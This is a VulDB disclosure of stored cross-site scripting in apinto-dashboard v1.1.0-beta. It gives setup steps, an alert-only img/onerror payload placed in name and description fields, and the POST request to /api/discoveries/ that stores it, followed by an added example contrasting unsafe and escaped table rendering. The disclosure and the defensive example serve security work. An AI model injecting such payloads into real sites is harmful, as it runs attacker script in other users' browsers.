Submit #50340: apinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-beta info

Title: apinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-beta

Description:

repo: https://github.com/eolinker/apinto-dashboard

1. Download and unzip the installation package Apinto
2. Start gateway
3. Download and unzip the installation package Apinto Dashboard
4. Start Apinto Dashboard

```bash
# Steps 1-2: fetch the Apinto gateway release and start it
wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto
./apinto start
cd ..
# Steps 3-4: fetch the Apinto Dashboard release and start it
wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard
./apinto-dashboard
```

This problem exists in most pages with tables. For example, on the /discoveries/list page, add an item at random and enter `<img src=1 onerror=alert(/xss/)>` in the description. Then click Details to trigger.

Request URL: /api/discoveries/

Request Method: POST

PostData: `{"health_on":false,"name":"1<img src=1 onerror=alert(111)>","driver":"static","description":"<img src=1 onerror=alert(222)>"}`

![XroR8.png](https://c2.im5i.com/2022/11/01/XroR8.png)
![Xr9Zz.png](https://c2.im5i.com/2022/11/01/Xr9Zz.png)
![Xr3pU.png](https://c2.im5i.com/2022/11/01/Xr3pU.png)
![XrZPw.png](https://c2.im5i.com/2022/11/01/XrZPw.png)

Reported by Neppah(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01.
User: Tomy (UID 34751)
Submission: 01/11/2022 12:09 (4 years ago)
Moderation: 01/11/2022 16:47 (5 hours later)
Status: Accepted
VulDB Entry: 212639 [eolinker apinto-dashboard /api/discoveries/ cross site scripting]
Points: 17
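
The submission shows the stored `name` and `description` fields reaching table markup unencoded. As an added illustration (not apinto-dashboard code and not part of the submission), the sketch below contrasts that rendering pattern with output encoding and adds an audit pass over records that are already stored. The function names and the second sample record are constructed for this example.

```javascript
// Added example: not apinto-dashboard code. Function names are hypothetical.

// Constructed sample of stored discovery records. Field names and the first
// record's values are taken from the PostData in the report.
const storedRecords = [
  { name: "1<img src=1 onerror=alert(111)>", driver: "static",
    description: "<img src=1 onerror=alert(222)>" },
  { name: "consul-prod", driver: "static", description: "Primary & backup" },
];

// Encode the characters that let text break out of HTML text or a quoted
// attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The pattern behind the report: stored fields concatenated into table markup.
function renderRowUnsafe(rec) {
  return `<tr><td>${rec.name}</td><td>${rec.driver}</td><td>${rec.description}</td></tr>`;
}

// The same row with every stored field encoded at output time.
function renderRowSafe(rec) {
  const cells = [rec.name, rec.driver, rec.description].map(escapeHtml);
  return `<tr><td>${cells.join("</td><td>")}</td></tr>`;
}

// Audit helper: list stored string fields that already contain tag-like
// markup, so entries saved before a fix can be reviewed.
function findMarkupFields(records) {
  const tagLike = /<\s*\/?\s*[a-zA-Z][^>]*>/;
  const hits = [];
  records.forEach((rec, index) => {
    for (const [field, value] of Object.entries(rec)) {
      if (typeof value === "string" && tagLike.test(value)) hits.push({ index, field });
    }
  });
  return hits;
}

console.log(renderRowSafe(storedRecords[0]));
console.log(findMarkupFields(storedRecords));
```

Encoding at render time covers every table page that displays these fields, while the audit pass identifies entries that were stored before the encoding was in place.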
